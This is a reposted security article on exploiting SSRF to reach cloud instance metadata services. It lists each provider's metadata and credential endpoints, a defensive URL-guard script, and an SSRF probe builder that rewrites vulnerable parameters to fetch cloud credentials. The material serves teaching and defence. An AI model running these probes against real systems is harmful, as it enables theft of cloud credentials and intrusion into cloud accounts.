Cloud providers run all of their services behind one shared network boundary and one authentication system, and the cloud's own components trust each other by default. Once an SSRF vulnerability exists on a host inside that boundary, the boundary effectively disappears: the attacker can reach the provider's supporting interfaces (above all the instance metadata service) directly from the vulnerable server. SSRF is therefore considerably more dangerous in a cloud environment than on a standalone host. This article covers exploiting SSRF in the cloud.
Author: 奇安信攻防社区 (中铁13层打工人)
Source: https://forum.butian.net/share/2412
1. Vulnerability overview
2. Case study: reading Tencent Cloud (TX) metadata via SSRF
3. Reading Alibaba Cloud metadata via SSRF
4. Hardening and defence
5. Extras
1. Cloud metadata endpoints by provider

AWS (http://169.254.169.254/latest/meta-data/)
Docs: http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories
http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key
http://169.254.169.254/latest/meta-data/public-keys/[ID]/openssh-key
Caveat: these plain GETs only work while IMDSv1 is enabled. An instance configured as IMDSv2-only answers 401 unless the client first obtains a session token with a PUT to /latest/api/token and sends it back in the X-aws-ec2-metadata-token header, which a GET-only SSRF cannot do. /latest/user-data is a single opaque blob (often a bootstrap script with secrets in it); it has no iam/ subtree.

GCP (http://169.254.169.254/computeMetadata/v1/)
Docs: https://cloud.google.com/compute/docs/metadata
Requires the header "Metadata-Flavor: Google" on API v1 (the older beta API accepted "X-Google-Metadata-Request: True"); requests without it are rejected, so an SSRF that cannot set request headers gets nothing here.
http://169.254.169.254/computeMetadata/v1/
http://metadata.google.internal/computeMetadata/v1/
http://metadata/computeMetadata/v1/
http://metadata.google.internal/computeMetadata/v1/instance/hostname
http://metadata.google.internal/computeMetadata/v1/instance/id
http://metadata.google.internal/computeMetadata/v1/project/project-id

Azure
Docs: https://docs.microsoft.com/en-us/azure/virtual-machines/windows/instance-metadata-service
Requires the header "Metadata: true"; the service also rejects any request carrying an X-Forwarded-For header, which is exactly what a forwarding proxy tends to add.
(Old) https://azure.microsoft.com/en-us/blog/what-just-happened-to-my-vm-in-vm-metadata-service/
http://169.254.169.254/metadata/instance?api-version=2017-04-02
http://169.254.169.254/metadata/instance/network/interface/0/ipv4/ipAddress/0/publicIpAddress?api-version=2017-04-02&format=text

Oracle Cloud Infrastructure
Docs: https://docs.us-phoenix-1.oraclecloud.com/Content/Compute/Tasks/gettingmetadata.htm
http://169.254.169.254/opc/v1/instance/

Oracle Cloud Compute Classic (legacy, 192.0.0.192)
Docs: https://docs.oracle.com/en/cloud/iaas/compute-iaas-cloud/stcsg/retrieving-instance-metadata.html
http://192.0.0.192/latest/
http://192.0.0.192/latest/user-data/
http://192.0.0.192/latest/meta-data/
http://192.0.0.192/latest/attributes/

Alibaba Cloud (http://100.100.100.200/latest/meta-data/)
Docs: https://help.aliyun.com/zh/ecs/user-guide/view-instance-metadata
http://100.100.100.200/latest/meta-data/<metadata>
http://100.100.100.200/latest/meta-data/instance-id
http://100.100.100.200/latest/meta-data/ram/security-credentials/
http://100.100.100.200/latest/meta-data/ram/security-credentials/huocorp-terraform-goat-role
Caveat: in normal mode the ECS metadata service answers plain GETs. In "security hardening mode" it requires a token, obtained with a PUT to /latest/api/token (header X-aliyun-ecs-metadata-token-ttl-seconds) and sent back as X-aliyun-ecs-metadata-token, so the same GET-only limitation as AWS IMDSv2 applies.

Tencent Cloud
Docs: https://cloud.tencent.com/document/product/213/4934
http://metadata.tencentyun.com/latest/meta-data/
http://169.254.0.23/latest/meta-data/
http://100.88.222.5/

Huawei Cloud (OpenStack-compatible metadata)
Docs: https://support.huaweicloud.com/usermanual-ecs/ecs_03_0166.html
http://169.254.169.254/openstack/latest/meta_data.json
http://169.254.169.254/openstack/latest/user_data
http://169.254.169.254/openstack/latest/network_data.json
http://169.254.169.254/openstack/latest/securitykey
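The defensive counterpart to the list above: a guard that a server-side fetcher runs before following a user-supplied URL. This is an added example, not code from the original article or from any provider. The blocked ranges are chosen to cover every metadata address listed above (169.254.0.0/16 for AWS, GCP, Azure, OCI, OpenStack and Tencent's 169.254.0.23; 100.64.0.0/10 for Alibaba's 100.100.100.200 and 100.88.222.5; 192.0.0.0/24 for the legacy Oracle 192.0.0.192) plus loopback and RFC 1918 space; the hostname list, the fake resolver in the test, and the `check_url` / `ip_is_blocked` names are assumptions made for the example.

```python
"""Outbound-fetch guard against SSRF to cloud metadata services.

Added example (not from the original article). Before a server-side fetch, it
resolves the target host and refuses anything that lands on a metadata address
from the list above, on link-local or private space, or on loopback. The resolver
is injectable so the check can be unit-tested without DNS; in production the
default resolver, which calls socket.getaddrinfo, is used.
"""
import ipaddress
import socket
from urllib.parse import urlsplit

# Networks covering every metadata address in the list plus RFC 1918 / loopback.
BLOCKED_NETWORKS = [ipaddress.ip_network(n) for n in (
    "0.0.0.0/8", "10.0.0.0/8", "100.64.0.0/10", "127.0.0.0/8", "169.254.0.0/16",
    "172.16.0.0/12", "192.0.0.0/24", "192.168.0.0/16",
    "::1/128", "fc00::/7", "fe80::/10",
)]

# Hostnames the metadata services answer on, refused before any DNS lookup.
BLOCKED_HOSTNAMES = {"metadata", "metadata.google.internal", "metadata.tencentyun.com"}

ALLOWED_SCHEMES = {"http", "https"}


def ip_is_blocked(ip_text):
    """True if the literal address falls inside a blocked network."""
    addr = ipaddress.ip_address(ip_text)
    # An IPv4-mapped IPv6 address (::ffff:169.254.169.254) is judged as its IPv4 form.
    if addr.version == 6 and addr.ipv4_mapped is not None:
        addr = addr.ipv4_mapped
    return any(addr in net for net in BLOCKED_NETWORKS)


def default_resolver(host):
    """All addresses the host resolves to; literal IPs resolve to themselves.

    getaddrinfo also normalises odd literals (decimal or octal forms), so they
    are judged by the address they really denote.
    """
    return sorted({info[4][0] for info in socket.getaddrinfo(host, None)})


def check_url(url, resolver=default_resolver):
    """Return (ok, reason). ok is True only if every resolved address is acceptable."""
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False, "scheme not allowed"
    host = parts.hostname  # strips userinfo, port and IPv6 brackets
    if not host:
        return False, "no host"
    if host.lower().rstrip(".") in BLOCKED_HOSTNAMES:
        return False, "metadata hostname"
    try:
        addrs = resolver(host)
    except OSError:
        return False, "unresolvable host"
    if not addrs:
        return False, "unresolvable host"
    for addr in addrs:
        try:
            blocked = ip_is_blocked(addr)
        except ValueError:
            return False, "unparseable address"
        if blocked:
            return False, f"{host} resolves to blocked address {addr}"
    return True, "ok"


if __name__ == "__main__":
    for candidate in ("http://www.xxx.com/index.php",
                      "http://169.254.169.254/latest/meta-data/",
                      "http://[::ffff:169.254.169.254]/latest/"):
        print(candidate, check_url(candidate))
```

The check resolves the name once, so the fetch must connect to the address that was validated (pin it and send the original Host header) rather than resolving again, or a DNS-rebinding answer defeats it; likewise redirects must not be followed automatically, and every redirect target has to go through `check_url` again.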
2. Common SSRF discovery scenarios and parameters

Common scenarios:
http://share.xxx.com/index.php?url=http://www.xxx.com
http://image.xxx.com/image.php?image=http://www.xxx.com
Common parameter names:
share, wap, url, link, src, source, target, u, 3g, display, sourceURL, imageURL, domain
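Putting the parameter list and the endpoint list together: the script below is an added example (not the author's code) that takes a request of the kind shown above, picks out the parameters worth testing, and rewrites each one to point at every provider's metadata endpoint from section 1. Services that insist on a request header (GCP, Azure) are flagged as out of reach for a plain GET-only SSRF unless the vulnerable fetcher lets the attacker add headers, and providers with a token-based hardened mode (AWS IMDSv2, Alibaba hardening mode) carry a note, since the PUT-then-GET exchange is equally out of reach. The `PROVIDERS` table, the function names and the sample request are assumptions made for the example.

```python
"""SSRF probe builder for cloud metadata services.

Added example for this article, not the author's code. Given a request URL with
a URL-valued parameter, it finds candidate SSRF parameters and builds one probe
per cloud provider, recording which probes a GET-only SSRF can actually deliver.
"""
from urllib.parse import parse_qsl, urlencode, urlsplit, urlunsplit

# Parameter names the article lists as common SSRF sinks (compared case-insensitively).
SSRF_PARAM_NAMES = {
    "share", "wap", "url", "link", "src", "source", "target", "u", "3g",
    "display", "sourceurl", "imageurl", "domain",
}

# One entry per provider from the endpoint list. `headers` are mandatory for that
# service; `token_mode` describes a hardened mode that needs a PUT before any GET.
PROVIDERS = [
    {"name": "AWS",
     "url": "http://169.254.169.254/latest/meta-data/iam/security-credentials/",
     "headers": {},
     "token_mode": "IMDSv2: PUT /latest/api/token, then X-aws-ec2-metadata-token on the GET"},
    {"name": "GCP",
     "url": "http://metadata.google.internal/computeMetadata/v1/",
     "headers": {"Metadata-Flavor": "Google"}, "token_mode": None},
    {"name": "Azure",
     "url": "http://169.254.169.254/metadata/instance?api-version=2017-04-02",
     "headers": {"Metadata": "true"}, "token_mode": None},
    {"name": "Oracle OCI",
     "url": "http://169.254.169.254/opc/v1/instance/",
     "headers": {}, "token_mode": None},
    {"name": "Alibaba Cloud",
     "url": "http://100.100.100.200/latest/meta-data/ram/security-credentials/",
     "headers": {},
     "token_mode": "hardening mode: PUT /latest/api/token, then X-aliyun-ecs-metadata-token on the GET"},
    {"name": "Tencent Cloud",
     "url": "http://metadata.tencentyun.com/latest/meta-data/",
     "headers": {}, "token_mode": None},
    {"name": "Huawei Cloud / OpenStack",
     "url": "http://169.254.169.254/openstack/latest/meta_data.json",
     "headers": {}, "token_mode": None},
]


def looks_like_url(value):
    """True for values that already carry a scheme or a protocol-relative prefix."""
    return value.lower().startswith(("http://", "https://", "//"))


def find_ssrf_params(request_url):
    """Query parameters worth testing: a known name, or any parameter whose value is a URL."""
    query = parse_qsl(urlsplit(request_url).query, keep_blank_values=True)
    return [name for name, value in query
            if name.lower() in SSRF_PARAM_NAMES or looks_like_url(value)]


def build_probes(request_url, param, header_injection=False):
    """Rewrite `param` to each provider's metadata URL, keeping the other parameters.

    header_injection=True means the SSRF lets the attacker add request headers,
    which makes the header-gated services (GCP, Azure) reachable as well.
    """
    parts = urlsplit(request_url)
    query = parse_qsl(parts.query, keep_blank_values=True)
    probes = []
    for prov in PROVIDERS:
        rewritten = [(k, prov["url"] if k == param else v) for k, v in query]
        probes.append({
            "provider": prov["name"],
            "url": urlunsplit(parts._replace(query=urlencode(rewritten))),
            "headers": dict(prov["headers"]),
            "reachable": header_injection or not prov["headers"],
            "note": prov["token_mode"],
        })
    return probes


if __name__ == "__main__":
    # Constructed sample request, taken from the scenario list above.
    target = "http://image.xxx.com/image.php?image=http://www.xxx.com"
    for name in find_ssrf_params(target):
        for p in build_probes(target, name):
            status = "GET ok" if p["reachable"] else "needs headers " + str(p["headers"])
            print(f"{p['provider']:<24} {status:<40} {p['url']}")
            if p["note"]:
                print(f"{'':<24} hardened mode: {p['note']}")
```

A probe that comes back empty does not prove the instance is safe: the service may simply be in its token mode, or the fetcher may be stripping the response. A probe that returns a role listing under security-credentials/ is the high-value result, since the next request for that role name yields temporary cloud credentials.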
The techniques, ideas and tools in articles published or reposted by 黑白之道 are provided only for security-oriented learning and exchange; nobody may use them for illegal purposes or for profit, and anyone who does bears the consequences.
If this repost infringes your rights, message us privately and we will take the article down.
Originally published on the WeChat public account 黑白之道: 云上的ssrf利用 (SSRF exploitation in the cloud)